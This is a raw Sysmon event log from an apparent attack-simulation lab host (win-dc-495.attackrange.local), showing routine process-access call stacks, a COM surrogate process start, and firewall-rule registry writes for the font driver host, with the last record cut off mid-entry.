10341000x800000000000000013752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.709{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.709{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.709{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.709{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.678{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.678{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.690{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000013733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.615{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9441-6005-1F05-00000000A301}7008C:\Windows\system32\fontdrvhost.exe0x13ffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.615{59A5CD1D-93F6-6005-E704-00000000A301}45725100C:\Windows\system32\winlogon.exe{59A5CD1D-9441-6005-1F05-00000000A301}7008C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+60dea|C:\Windows\system32\winlogon.exe+3508a|C:\Windows\system32\winlogon.exe+1bbfd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:29.553{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523S-1-5-18v2.26|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|LUOwn=S-1-5-18|M=microsoft.windows.fontdrvhost|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host| 13241300x800000000000000013730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:29.553{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005de) 13241300x800000000000000013729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:29.553{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{FF9DDC57-1E79-4544-A1DC-B016708E7487}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host|LUOwn=S-1-5-18|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|EmbedCtxt=Usermode Font Driver Host| 13241300x800000000000000013728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:29.553{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005dd) 13241300x800000000000000013727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:29.553{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B53BAE1E-A0CD-4D4F-82C8-4C4E5F868D0A}v2.26|Action=Block|Active=TRUE|Dir=In|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host|LUOwn=S-1-5-18|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|EmbedCtxt=Usermode Font Driver Host| 10341000x800000000000000013726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 